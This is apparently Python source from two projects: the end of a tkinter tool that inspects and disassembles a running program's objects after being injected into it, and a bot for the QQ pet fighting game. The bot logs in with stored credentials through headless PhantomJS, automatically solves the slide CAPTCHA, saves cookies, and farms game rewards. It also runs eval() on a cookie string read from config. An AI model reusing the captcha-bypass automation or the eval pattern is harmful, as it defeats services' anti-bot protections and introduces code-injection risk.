self.style.configure('Treeview', rowheight=30)
self.globalTree['columns'] = ("ID", "Symbol", "Value")
self.globalTree.column("#0", anchor="w", width=60, stretch=True)
self.globalTree.column("ID", anchor="w", width=60, stretch=True)
self.globalTree.column("Symbol", anchor="w", width=120, stretch=True)
self.globalTree.column("Value", anchor="w", stretch=True)
self.globalTree.heading("#0", text="Type", anchor="w")
self.globalTree.heading("ID", text="ID", anchor="w")
self.globalTree.heading("Symbol", text="Symbol", anchor="w")
self.globalTree.heading("Value", text="Value", anchor="w")
self.gscroll_x.config(command=self.globalTree.xview)
self.gscroll_y.config(command=self.globalTree.yview)
self.globalTree = self.populateGlobalTree(self.globalTree)
self.globalTree.bind('<Button-3>', lambda popup: self.treeMenu(popup, self.globalTree))
self.gRightClickMenu.add_command(label="Inspect", command=lambda: self.inspect(self.globalTree))
self.gRightClickMenu.add_command(label="Find Instances", command=self.globalInstanceType)
# Inspector frame items.
self.inspectorFrame.grid_propagate(False)
self.inspectorDisFrame.grid_propagate(False)
self.inspectorTreeFrame.grid_propagate(False)
self.disScroll_y.config(command=self.disassemblyText.yview)
self.disScroll_x.config(command=self.disassemblyText.xview)
self.iScroll_y.config(command=self.inspectorTree.yview)
self.iScroll_x.config(command=self.inspectorTree.xview)
self.disassemblyText.config(wrap="none")
self.inspectorTree['columns'] = ("ID", "Symbol", "Value")
self.inspectorTree.column("#0", anchor="w", width=60, stretch=True)
self.inspectorTree.column("ID", anchor="w", width=60, stretch=True)
self.inspectorTree.column("Symbol", anchor="w", width=120, stretch=True)
self.inspectorTree.column("Value", anchor="w", stretch=True)
self.inspectorTree.heading("#0", text="Type", anchor="w")
self.inspectorTree.heading("ID", text="ID", anchor="w")
self.inspectorTree.heading("Symbol", text="Symbol", anchor="w")
self.inspectorTree.heading("Value", text="Value", anchor="w")
self.inspectorTree.bind('<Button-3>', lambda popup: self.treeMenu(popup, self.inspectorTree))
self.iRightClickMenu.add_command(label="Enumerate", command=self.enumerateChildren)
self.iRightClickMenu.add_command(label="Disassemble", command=self.disassembleObject)
# Object frame items.
self.objectInstanceFrame.grid_propagate(False)
self.objectTreeType = None
self.tscroll_y.config(command=self.typeList.yview)
self.tscroll_x.config(command=self.typeList.xview)
self.oscroll_x.config(command=self.objectTree.xview)
self.oscroll_y.config(command=self.objectTree.yview)
self.typeList.bind('<Button-3>', lambda popup: self.listMenu(popup, self.typeList))
self.tRightClickMenu.add_command(label="Find Instances", command=lambda: self.populateObjectTree(self.typeList.get(self.typeList.curselection()[0])))
self.objectTree['columns'] = ("ID", "Symbol", "Value")
self.objectTree.column("#0", anchor="w", width=60, stretch=True)
self.objectTree.column("ID", anchor="w", width=60, stretch=True)
self.objectTree.column("Symbol", anchor="w", width=120, stretch=True)
self.objectTree.column("Value", anchor="w", stretch=True)
self.objectTree.heading("#0", text="Type", anchor="w")
self.objectTree.heading("ID", text="ID", anchor="w")
self.objectTree.heading("Symbol", text="Symbol", anchor="w")
self.objectTree.heading("Value", text="Value", anchor="w")
self.objectTree.bind('<Button-3>', lambda popup: self.treeMenu(popup, self.objectTree))
self.oRightClickMenu.add_command(label="Inspect", command=lambda: self.inspect(self.objectTree))
def launch(self):
gc.enable()
self.populateTypeList()
self.resizeTreeColumns(self.globalTree)
self.window.attributes('-topmost', 0)
self.window.mainloop()
# ================================
# Utility Functions
# ================================
# Enumerate function arguments. Returns argc int and argv list.
def funcArgs(self, function):
args = []
for i in range(function.__code__.co_argcount):
args.append(function.__code__.co_varnames[i])
return(args)
# Enumerate inspector object's children.
def enumerateChildren(self):
iid = self.inspectorTree.selection()[0]
self.parseChildren(iid)
# Attempt to disassemble object.
def disassembleObject(self):
iid = self.inspectorTree.selection()[0]
item = self.inspectorTree.item(iid)
itemId = item["values"][0]
object = self.inspectorObjs[itemId]
self.disassemblyText.delete('1.0', tkinter.END)
try:
disassembled = dis.Bytecode(object).dis()
self.disassemblyText.insert(tkinter.INSERT, disassembled)
except:
self.disassemblyText.insert(tkinter.INSERT, "Could not disassemble object.")
# Finds the instance type of the selected global tree symbol.
def globalInstanceType(self):
item = self.globalTree.item(self.globalTree.selection()[0])
itemType = item["text"]
if (itemType == "type"):
itemType = item["values"][0]
self.populateObjectTree(itemType)
# Find the object to be inspected and pass it to populate function.
def inspect(self, tree):
item = None
self.inspecting = None
# Find object from item.
def findObject(item):
itemId = item["values"][0]
if (tree == self.globalTree):
for glob in dict(globals()):
if (id(globals()[glob]) == itemId):
self.inspecting = globals()[glob]
else:
for obj in list(gc.get_objects()):
if (id(obj) == itemId):
self.inspecting = obj
iid = tree.selection()[0]
while (tree.parent(iid)):
iid = tree.parent(iid)
item = tree.item(iid)
findObject(item)
if (self.inspecting == None):
return
self.populateInspectorTree(self.inspecting)
# Parse children of selected object in inspector tree.
def parseChildren(self, parentIid):
item = self.inspectorTree.item(parentIid)
object = self.inspectorObjs[item["values"][0]]
objectType = type(object).__name__
if (objectType == "list" or objectType == "set" or objectType == "tuple"):
for child in object:
self.inspectorObjs[id(child)] = child
self.insertTree(self.inspectorTree, "", child, parentIid)
elif (objectType == "dict"):
for child in object:
self.inspectorObjs[id(object[child])] = object[child]
self.insertTree(self.inspectorTree, child, object[child], parentIid)
else:
children = {}
referents = gc.get_referents(object)
if (len(referents) > 0):
if (type(referents[0]).__name__ == 'dict'):
children = referents[0]
# Add children to tree.
for child in children:
self.inspectorObjs[id(children[child])] = children[child]
self.insertTree(self.inspectorTree, child, children[child], parentIid)
self.resizeTreeColumns(self.inspectorTree)
# Resize the window to proper proportions when window <Configure> event is triggered.
def resize(self, arg):
self.window.update_idletasks()
self.width = self.window.winfo_width()
self.height = self.window.winfo_height()
self.globalFrame.config(height=(self.height * (5/8)), width=(self.width * (2/3)))
self.objectInstanceFrame.config(height=(self.height * (2.5/8)), width=(self.width * (2/3)))
self.inspectorFrame.config(width=(self.width * (1/3)))
self.inspectorDisFrame.config(height=(self.objectInstanceFrame.winfo_height()))
# Resize tree columns to fit top level content. (FIX ME)
def resizeTreeColumns(self, tree):
indices = tree.get_children()
largestType = 0
largestID = 0
largestSymbol = 0
largestValue = 0
for index in indices:
typeString = tree.item(index)["text"]
idString = tree.item(index)["values"][0]
symbolString = tree.item(index)["values"][1]
valueString = tree.item(index)["values"][2]
if (largestType < font.Font.measure(font.nametofont("TkDefaultFont"), typeString)):
largestType = font.Font.measure(font.nametofont("TkDefaultFont"), typeString)
if (largestID < font.Font.measure(font.nametofont("TkDefaultFont"), idString)):
largestID = font.Font.measure(font.nametofont("TkDefaultFont"), idString)
if (largestSymbol < font.Font.measure(font.nametofont("TkDefaultFont"), symbolString)):
largestSymbol = font.Font.measure(font.nametofont("TkDefaultFont"), symbolString)
if (largestValue < font.Font.measure(font.nametofont("TkDefaultFont"), valueString)):
largestValue = font.Font.measure(font.nametofont("TkDefaultFont"), valueString)
tree.column("#0", width = (largestType * 3))
tree.column(0, width = (largestID * 3))
tree.column(1, width = (largestSymbol * 3))
tree.column(2, width = (largestValue * 3))
# Select the proper tree item when right clicked, and open the right click menu.
def treeMenu(self, event, tree):
iid = tree.identify_row(event.y)
if (iid):
tree.selection_set(iid)
if (tree == self.globalTree):
self.gRightClickMenu.post(event.x_root, event.y_root)
elif (tree == self.objectTree):
self.oRightClickMenu.post(event.x_root, event.y_root)
else:
self.iRightClickMenu.post(event.x_root, event.y_root)
# Select the proper list item when right clicked, and open the right click menu.
def listMenu(self, event, listbox):
listbox.selection_clear(0, tkinter.END)
listbox.selection_set(listbox.nearest(event.y))
listbox.activate(listbox.nearest(event.y))
selection = listbox.get(listbox.curselection()[0])
if (selection != None):
self.tRightClickMenu.post(event.x_root, event.y_root)
# Populate the type list with every object type tracked by the GC.
def populateTypeList(self):
self.typeList.delete(0, tkinter.END)
objects = gc.get_objects()
typesList = []
for obj in objects:
if (not type(obj).__name__ in typesList):
typesList.append(type(obj).__name__)
typesList.sort()
for t in typesList:
self.typeList.insert(tkinter.END, t)
# Insert item into treeview.
def insertTree(self, tree, symbol, object, parent):
objectType = type(object).__name__
children = [] # [key, value, parent]
def getIid():
if (tree == self.globalTree):
self.globIid += 1
return(self.globIid)
elif (tree == self.objectTree):
self.objIid += 1
return(self.objIid)
else: # self.inspectorTree
self.inspectorIid += 1
return(self.inspectorIid)
if (objectType == 'int' or objectType == 'float' or objectType == 'bool' or objectType == 'str' or objectType == 'complex'):
tree.insert(parent=parent, index='end', iid=getIid(), text=objectType, values=(id(object), symbol, object))
elif (objectType == 'list' or objectType == 'set' or objectType == 'tuple'):
parentIid = getIid()
tree.insert(parent=parent, index='end', iid=parentIid, text=objectType, values=(id(object), symbol, ("<" + objectType + " '" + str(len(object)) + "'>")))
for child in object:
children.append(["", child, parentIid])
elif (objectType == 'dict'):
parentIid = getIid()
tree.insert(parent=parent, index='end', iid=parentIid, text=objectType, values=(id(object), symbol, ("<" + objectType + " '" + str(len(object)) + "'>")))
for child in object:
children.append([child, object[child], parentIid])
elif (objectType == 'function' or objectType == 'method'):
callView = symbol + str(self.funcArgs(object)).replace("[", "(").replace("]", ")").replace("'", "")
tree.insert(parent=parent, index='end', iid=getIid(), text=objectType, values=(id(object), symbol, callView))
else:
tree.insert(parent=parent, index='end', iid=getIid(), text=objectType, values=(id(object), symbol, object))
return(children)
# Populate global symbol list tree.
def populateGlobalTree(self, tree):
self.globIid = -1
# Clear contents of global tree.
for glob in self.globalTree.get_children():
self.globalTree.delete(glob)
# Add item to tree, return all children of item. (Too much recursion may cause stack overflow, need to iterate.)
def addItem(tree, key, value, parent=''):
children = self.insertTree(tree, key, value, parent)
return(children)
# Remove all imports caused by injecting inspector.
localModules = ["os", "sys", "subprocess", "importlib", "tkinter", "ttk", "font"]
unsorted = dict(globals())
for module in localModules:
if (not module in self.preserved):
del(unsorted[module])
# Sort all globals into types.
sorted = {}
for object in unsorted:
typeName = type(unsorted[object]).__name__
if (not typeName in sorted):
sorted[typeName] = {}
sorted[typeName][object] = unsorted[object]
# Parse sorted items into list with no parent.
# Items Element = [key, value, parent]
items = []
for sType in sorted:
for item in sorted[sType]:
items.append([item, sorted[sType][item], ''])
# While there are still items to add, pass to addItem and add children to items.
while (len(items) > 0):
item = items.pop()
children = addItem(tree, item[0], item[1], item[2])
items.extend(children)
return(tree)
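# The worklist loop above, in isolation: items are expanded iteratively rather
# than recursively, so deeply nested containers cannot overflow the call stack.
# ('expand' is a stand-in for insertTree returning a list of child items.)
#
#   items = [root]
#   while items:
#       item = items.pop()
#       items.extend(expand(item))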
# Populate the objects tree with chosen type of object.
def populateObjectTree(self, objectType):
self.objIid = -1
for glob in self.objectTree.get_children():
self.objectTree.delete(glob)
def addItem(tree, key, value, parent=''):
children = self.insertTree(tree, key, value, parent)
return(children)
if (not objectType == None and not objectType == "NoneType"):
self.objectTreeType = objectType
objects = gc.get_objects()
toAdd = []
for obj in objects:
if (type(obj).__name__ == objectType):
toAdd.append(obj)
items = []
for item in toAdd:
symbol = ''
for glob in dict(globals()):
if (id(globals()[glob]) == id(item)):
symbol = glob
items.append([symbol, item, ''])
while (len(items) > 0):
current = items.pop()
children = addItem(self.objectTree, current[0], current[1], current[2])
items.extend(children)
self.resizeTreeColumns(self.objectTree)
# Populate the inspector tree with object and its first level children.
def populateInspectorTree(self, rootObject):
self.inspectorObjs = {id(rootObject): rootObject}
self.inspectorIid = -1
# Wipe previous tree.
for obj in self.inspectorTree.get_children():
self.inspectorTree.delete(obj)
# Search for symbol in global scope.
rootSymbol = ""
for glob in dict(globals()):
if id(globals()[glob]) == id(rootObject):
rootSymbol = glob
# Add object, and then first level children.
self.insertTree(self.inspectorTree, rootSymbol, rootObject, "")
self.parseChildren(0)
self.resizeTreeColumns(self.inspectorTree)
# Spawn Inspector in daemon thread, clean globals.
threading.Thread(target=Inspector, daemon=True).start()
|
functions.py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""
@File : functions.py
@Contact : 958615161@qq.com
@Modify Time @Author @Version @Description
------------ ------- -------- -----------
2020/8/8 20:55 zjppp 1.0 None
"""
import json
import random
import re
import sys
import threading
import time
from datetime import datetime
from time import sleep
import requests
from selenium import webdriver
from selenium.webdriver import DesiredCapabilities
from slideVerfication import SlideVerificationCode
today = time.strftime("%Y-%m-%d", time.localtime())
dayOfWeek = datetime.now().isoweekday()
hour = datetime.now().hour
minute = datetime.now().minute
header = {
'accept': '*/*',
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'zh-CN,zh;q=0.9',
'referer': 'https://fight.pet.qq.com/',
'sec-fetch-mode': 'cors',
'sec-fetch-site': 'origin',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36',
'x-requested-with': 'XMLHttpRequest'
}
cookie = {}
req = requests.Session()
req.headers = header
def login(userconf, conf, user, log, longintype=0):
"""
็ปๅฝ
:param userconf:ๅฝๅ็จๆท็้
็ฝฎ
:param conf:ๅฝๅ็จๆทๅ
:param user:
:param log:
:param longintype:
:return:
"""
log.info("---------------------------------------------------------")
flag = False
cookie = userconf.get("cookie")
username = userconf.get("username")
pwd = userconf.get("password")
if len(str(cookie)) != 0:
cookie = eval(cookie)
flag = isLogin(header, cookie, username)  # True if the cookie has not expired
if flag:
print("cookie็ปๅฝๆๅ")
else:
try:
print("cookieไธๅญๅจๆๅทฒๅคฑๆ๏ผไฝฟ็จๅฏ็ ็ปๅฝ")
# PhantomJSไผช่ฃ
chrome
dcap = dict(DesiredCapabilities.PHANTOMJS)
dcap['phantomjs.page.settings.userAgent'] = ('Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36')
driver = webdriver.PhantomJS(executable_path=r"phantomjs",desired_capabilities=dcap,service_args=['--ignore-ssl-errors=true'])
# driver = webdriver.Chrome(executable_path='chromedriver')
driver.implicitly_wait(3)
if str(longintype).startswith("0"):
# option 0: log in through the mobile game entry page
log.info("Preparing to log in.....")
driver.get(
"http://ui.ptlogin2.qq.com/cgi-bin/login?appid=614038002&style=9&s_url=http%3A%2F%2Fdld.qzapp.z.qq.com%2Fqpet%2Fcgi-bin%2Fphonepk%3Fcmd%3Dindex%26channel%3D0")
driver.find_element_by_id('u').clear()
driver.find_element_by_id('u').send_keys(username)
driver.find_element_by_id('p').clear()
driver.find_element_by_id('p').send_keys(pwd)
driver.find_element_by_id('go').click()
sleep(5)
else:
# option 1: log in through the Qzone game app center
log.info("Preparing to log in.....")
driver.get(
"https://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=549000912&daid=5&s_url=https%3A%2F%2Fgame.qzone.qq.com%2F%3Ffrom%3Dgameapp&style=20&border_radius=1&target=top&maskOpacity=40&")
driver.find_element_by_id('switcher_plogin').click()
driver.find_element_by_id('u').clear()
driver.find_element_by_id('u').send_keys(username)
driver.find_element_by_id('p').clear()
driver.find_element_by_id('p').send_keys(pwd)
driver.find_element_by_id('login_button').click()
sleep(5)
currentUrl = str(driver.current_url)
# handle slide verification
if currentUrl.startswith("https://ui.ptlogin2.qq.com/cgi-bin/login"):
log.info("Slide captcha appeared for this login, attempting automatic recognition......")
sleep(5)
# perform slide verification
# 1. locate the iframe containing the captcha and switch to it
v_frame = driver.find_element_by_id('tcaptcha_iframe')
driver.switch_to.frame(v_frame)
# 2. get the captcha slider image element
sli_ele = driver.find_element_by_id('slideBlock')
# 3. get the captcha background image element
bg_ele = driver.find_element_by_id('slideBg')
# 4. work out how far the slider must travel
# 4.1 locate the gap in the background image
sv = SlideVerificationCode()
distance = sv.get_element_slide_distance(sli_ele, bg_ele)
# 4.2 adjust the sliding distance for the page scaling ratio
dis = distance * (280 / 680) + 10
# 5. get the slider drag button
sli_btn = driver.find_element_by_id('tcaptcha_drag_thumb')
# 6. drag the slider to perform the verification
flag = sv.slide_verification(driver, sli_btn, dis)
sleep(3)
currentUrl = str(driver.current_url)
flag = ""
if str(longintype).startswith("0"):
flag = "https://dld.qzapp.z.qq.com/qpet/cgi-bin"
else:
flag = "https://game.qzone.qq.com/?from=gameapp"
if currentUrl.startswith(flag):
log.info("็ปๅฝๆๅ๏ผๅๅคๅผๅงๆง่กไปปๅก")
else:
log.info("็ป้ๅคฑ่ดฅ๏ผ่ชๅจ้ๅบ")
sleep(1)
driver.quit()
sleep(1)
sys.exit()
sleep(5)
cookie = getCookie(driver, log)
# print("ๅๅ
ฅ๏ผ" + str(user)) #debug
# print(cookie)
conf.read("./conf/user.conf") # ๆไปถ่ทฏๅพ่ฏปconf
conf.set(user, "cookie", str(cookie)) # ไฟฎๆนๆๅฎsection ็option
with open('./conf/user.conf', 'w') as configfile:
conf.write(configfile)
finally:
driver.quit()
req.cookies.update(cookie)
def isLogin(header, cookie, qqnum):
response = req.get("https://fight.pet.qq.com/cgi-bin/petpk?cmd=view&kind=0&sub=2&type=4&selfuin=" + str(qqnum),
headers=header, cookies=cookie)
json = parser(response)
flag = False
if str(json.get("msg")).startswith("OK"):
flag = True
return flag
def getCookie(driver, log):
"""
Get cookies.
:param driver: webdriver
:return: cookie_dict, dict of cookies
"""
cookie_list = driver.get_cookies()
cookie_dict = {}
for cookie in cookie_list:
if 'name' in cookie and 'value' in cookie:
cookie_dict[cookie['name']] = cookie['value']
log.info("่ทๅcookieๆๅ")
return cookie_dict
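# For reference, driver.get_cookies() in Selenium returns a list of dicts like
#   [{'name': 'uin', 'value': 'o12345', 'domain': '.qq.com', ...}]
# (illustrative values); only the 'name' and 'value' keys are kept above.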
# current personal status (todo)
def getPersonalStatus(html):
"""
:param html:
:return:
"""
str1 = str(html)
regex = []
regex.append(r"็ญ็บง:[1-9]\d*๏ผ[1-9]\d*/[1-9]\d*๏ผ") # ๅน้
็ญ็บง
regex.append(r"ไฝๅ:[1-9]\d*/[1-9]\d*") # ๅน้
ไฝๅ
regex.append(r"ๆดปๅ:[1-9]\d*/[1-9]\d*") # ๅน้
ๆดปๅ
regex.append(r"็ๅฝ:[1-9]\d*\+[1-9]\d*") # ๅน้
็ๅฝ
regex.append(r"ๅ้:[1-9]\d*\+[1-9]\d*") # ๅน้
ๅ้
regex.append(r"ๆๆท:[1-9]\d*\+[1-9]\d*") # ๅน้
ๆๆท
regex.append(r"้ๅบฆ:[1-9]\d*\+[1-9]\d*") # ๅน้
้ๅบฆ
statusDict = {}
for i in range(7):
value = re.compile(regex[i]).search(str1).group()
var = value.split(":", 2)
statusDict[var[0]] = var[1]
return statusDict
def generateID(idtype):
'''
Generate a dungeon boss id. Generation rules:
level 1: (1-4)110(1-4)0000 -> a110b0000
level 2: (1-4)210(0-9)00(01-10) -> a210c00d
level 3: (1-4)310(0-9)(0001-4000) -> a310ce
:param idtype: type of id to generate
:return: id
'''
a = random.randint(1, 4)
b = random.randint(1, 4)
c = random.randint(0, 9)
d = random.randint(1, 10)
d = str(d).zfill(2)
e = random.randint(1, 4000)
e = str(e).zfill(4)
if idtype == 3:
return str(a) + "310" + str(c) + e
elif idtype == 2:
return str(a) + "210" + str(c) + "00" + d
else:
return str(a) + "110" + str(b) + "0000"
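# Example outputs (values are random; digits shown are just one possible draw):
#   generateID(1) -> "111020000"   (a=1, b=2)
#   generateID(2) -> "121050007"   (a=1, c=5, d="07")
#   generateID(3) -> "131054000"   (a=1, c=5, e="4000")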
def kezhanlingjiang(log):
"""
ๅฎขๆ ้ขๅฅ
:param log: ๆฅๅฟ่พๅบ
:return:
"""
kezhandajianlingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=knight&op=14&type=1&id=%(id)s"
kezhanzhudianlingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=knight&op=14&type=2&id=%(id)s"
for i in range(3):
if 8 <= hour < 20:
j = requestURL(kezhanzhudianlingjiang % {"id": str(i + 1)})
if str(j.get("msg")).startswith("ๅฅๅฑๅทฒ็ป้ขๅ่ฟไบ"):
continue
log.info(j.get("msg"))
else:
j = requestURL(kezhandajianlingjiang % {"id": str(i + 1)})
if str(j.get("msg")).startswith("ๅฅๅฑๅทฒ็ป้ขๅ่ฟไบ"):
continue
log.info(j.get("msg"))
def mengxiangzhilv(log):
"""
ๆขฆๆณไนๆ
todo ้ขๅฅ
:param log: ๆฅๅฟ่พๅบ
:return:
"""
mengxiangzhilvchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=dreamtrip&bmapid=0&sub=0"
mengxiangzhilvputong = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=dreamtrip&smapid=0&sub=1"
mengxiangzhilvquyujiangli = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=dreamtrip&bmapid=%(bmapid)s&sub=2"
j = requestURL(mengxiangzhilvchaxun)
curid = j.get("curid") # ๅฝๅๅฒๅฑฟid
normalticket = j.get("normalticket")
if int(normalticket) > 0:
# travel normally once
j = requestURL(mengxiangzhilvputong)
msg = j.get("msg")
if not str(msg).startswith("ๅฝๅๆฒกๆๆฎ้ๆบ็ฅจ"):
log.info("ๆขฆๆณไนๆ
-ๆฎ้ๆ
่ก๏ผ" + msg)
# region rewards
j = requestURL(mengxiangzhilvchaxun)
smap_info = j.get("smap_info")  # current island info
bmap_info = j.get("bmap_info")  # info for all islands
flag = True
for item in smap_info:
if int(item.get("status")) != 1:
flag = False
break
if flag == True:
j = requestURL(mengxiangzhilvquyujiangli % {"bmapid": curid})
msg = j.get("msg")
log.info("ๆขฆๆณไนๆ
-ๅบๅ้ขๅฅ๏ผ" + msg)
sum = 0
for item in bmap_info:
sum = sum + int(item.get("status"))
if sum == 4: # all 4 regions are 1
pass # todo claim the all-region reward
pass
def huajuanmizong(log):
"""
็ปๅท่ฟท่ธช
:param log:
:return:
"""
huajuanmizongchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=scroll_dungeon"
huajuanmizong = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=scroll_dungeon&op=fight&buff=0"
j = requestURL(huajuanmizongchaxun)
free_times = j.get("free_times")
pay_times = j.get("pay_times")
if int(free_times) + int(pay_times) == 0:
return
# fight until attempts run out (up to 10 tries)
for i in range(10):
j = requestURL(huajuanmizong)
msg = j.get("msg")
if str(msg).startswith("ๆฒกๆๆๆๆฌกๆฐ"):
break
else:
log.info("็ปๅท่ฟท่ธช-ๆๆ๏ผ" + msg)
def qunxiongzhulu(log):
"""
็พค้้้นฟ
:param log:
:return:
"""
qunxiongbaoming = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=thronesbattle&op=signup"
qunxionglingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=thronesbattle&op=drawreward"
qunxiongchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=thronesbattle"
qunxiongpaihangbangchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=thronesbattle&op=queryrank&type=season&zone=%(zone)s"
qunxiongpaihangbanglingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=thronesbattle&op=drawrankreward"
# 1. sign up
if (dayOfWeek == 5 and hour >= 14) or (dayOfWeek == 1 and hour < 14) or (6 <= dayOfWeek <= 7):
j = requestURL(qunxiongbaoming)
msg = j.get("msg")
log.info("็พค้้้นฟ-ๆฅๅ๏ผ" + msg)
# 2. claim rewards
j = requestURL(qunxionglingjiang)
msg = j.get("msg")
if str(msg).startswith("ไฝ ๅทฒ็ป้ขๅ"):
pass
else:
log.info("็พค้้้นฟ-้ขๅฅ" + msg)
# 3. leaderboard rewards
# response = requests.get(URL.qunxiongpaihangbang, headers=header, cookies=cookie)
# HTML = response.content.decode('utf-8')
j = requestURL(qunxiongchaxun)
signed_up_zone = j.get("signed_up_zone")
if str(signed_up_zone) in ["1", "2", "3", "4"]:
j = requestURL(qunxiongpaihangbangchaxun % {"zone": str(signed_up_zone)})
self_rank = j.get("self_rank")
if int(self_rank) > 0 and int(self_rank) <= 1000:
j = requestURL(qunxiongpaihangbanglingjiang)
msg = j.get("msg")
if str(msg).startswith("ๆฌๅฑๅทฒ็ป้ขๅๆ่กๆฆๅฅๅฑ"):
pass
else:
log.info("็พค้้้นฟ-ๆ่กๆฆ้ขๅฅ" + msg)
def huanjing(log):
"""
ๅนปๅข
:param log:
:return:
"""
huanjingtuichu = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=misty&op=return"
huanjingjinru = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=misty&op=start&stage_id=%(stage_id)s"
huanjingzhandou = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=misty&op=fight"
# leave the dungeon
j = requestURL(huanjingtuichu)
# enter the dungeon (id 1-20)
j = requestURL(huanjingjinru % {"stage_id": "20"})
msg = j.get("msg")
if str(msg).startswith("ๅฏๆฌๆชๅผ้") or str(msg).startswith("ๆจ็ๆๆๆฌกๆฐๅทฒ็จๅฎ๏ผ่ฏทๆๆฅๅๆ"):
log.info("ๅนปๅข-่ฟๅ
ฅๅฏๆฌ๏ผ" + msg)
else:
cur_stage = j.get("cur_stage")
log.info("ๅนปๅข-่ฟๅ
ฅๅฏๆฌ๏ผ็ฌฌ" + str(cur_stage) + "ๅ
ณ")
# fight
for i in range(5):
j = requestURL(huanjingzhandou)
msg = j.get("msg")
log.info("ๅนปๅข-ๆๆ๏ผ" + msg)
# leave the dungeon
j = requestURL(huanjingtuichu)
msg = j.get("msg")
if str(msg).startswith("ๅฝๅๅฏๆฌๆช็ปๆ"):
pass
else:
challenge_times = j.get("challenge_times")
log.info("ๅนปๅข-้ๅบๅฏๆฌ๏ผๅฝๅๅฉไฝๆๆๆฌกๆฐ " + challenge_times)
def lilian(bossid, times, log):
"""
ๅ็ปๆๅฎbossid๏ผๆtimesๆฌก
:param bossid: boss็id
:param times: ๆๆๆฌกๆฐ๏ผๆๅคง3ๆฌก๏ผ
:param log:
:return:
"""
lilian = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=mappush&type=1&npcid=%(npcid)s"
for i in range(min(int(times), 3)):
j = requestURL(lilian % {"npcid": str(bossid)})
msg = j.get("msg")
if str(msg) == "":
log.info("ๅ็ป๏ผๆๆๆๅ")
else:
log.info("ๅ็ป๏ผ" + msg)
def xuyuan(username, log):
"""
่ฎธๆฟ
:param username:
:param log:
:return:
"""
xuyuanjinrilingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=wish&sub=3"
xuyuanjinri = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=wish&sub=2"
xuyuanchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=wish&sub=1"
xuyuansantian = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=wish&sub=6"
# claim yesterday's wish reward
j = requestURL(xuyuanjinrilingjiang)
if j != None:
msg = j.get("msg")
if not str(msg).startswith("ๅพๆฑๆญ"):
name = j.get("name")
num = j.get("num")
log.info("่ฎธๆฟ๏ผ่ทๅ" + name + "*" + num)
# ๆ่ชๅทฑไธๆฌก๏ผ็กฎไฟๆ้ฆ่
fight(log, username)
# make today's wish
j = requestURL(xuyuanjinri)
msg = j.get("msg")
if str(msg).startswith("่ฎธๆฟๅคฑ่ดฅ๏ผ่ฏทๅ่ฏไธๆฌก"):
pass
else:
log.info("่ฎธๆฟ๏ผ" + msg)
j = requestURL(xuyuanchaxun)
days = j.get("days")
if str(days).startswith("3"):
# claim the reward for making wishes 3 days in a row
j = requestURL(xuyuansantian)
msg = j.get("msg")
log.info("่ฎธๆฟ๏ผ" + msg)
def huangjinliansai(log):
"""
้ป้่่ต todo ่ตๅญฃๆซ้ขๅฅ๏ผๆๆ
:param log:
:return:
"""
huangjinliansailingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=factionleague&op=5"
# 1. Golden League rewards
j = requestURL(huangjinliansailingjiang)
msg = j.get("msg")
log.info("้ป้่่ต๏ผ" + msg)
def fight(log, qqnum):
"""
ๆๆๆๅฎqqๅท
:param log:
:param qqnum: QQๅท
:return:
"""
qqfight = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=fight&puin=%(puin)s"
response = req.get(qqfight % {"puin": str(qqnum)})
# result = jiexifanhuixiaoxi(response,"result")
def shiergong(log, scene_id=1011):
"""
ๅไบๅฎซ
:param log:
:param scene_id: ๅบๆฏid๏ผ่ๅดไธบ1000-1011
:return:
"""
shiergongchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=zodiacdungeon&op=query"
shiergong = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=zodiacdungeon&op=autofight&pay_recovery_count=0&scene_id=%(scene_id)s"
j = requestURL(shiergongchaxun)
left_challenge_times = j.get("left_challenge_times")
if int(left_challenge_times) != 0:
j = requestURL(shiergong % {"scene_id": str(scene_id)})
msg = j.get("msg")
log.info("ๅไบๅฎซ-ๆๆ๏ผ" + msg)
def tiguan(log):
"""
่ธข้ฆ
:param log:
:return:
"""
tiguanchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=fac_challenge&subtype=0"
tiguanzhuanpan = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=fac_challenge&subtype=6"
tiguanshilian = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=fac_challenge&subtype=2"
tiguantiaozhan = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=fac_challenge&subtype=3"
tiguanlingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=fac_challenge&subtype=9"
tiguanpaihangbanglingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=fac_challenge&subtype=10"
j = requestURL(tiguanchaxun)
isFightTime = j.get("isFightTime")
isAwardTime = j.get("isAwardTime")
if str(isFightTime).startswith("1"):
highRadio = j.get("highRadio")
figntNpcTimes = j.get("figntNpcTimes")
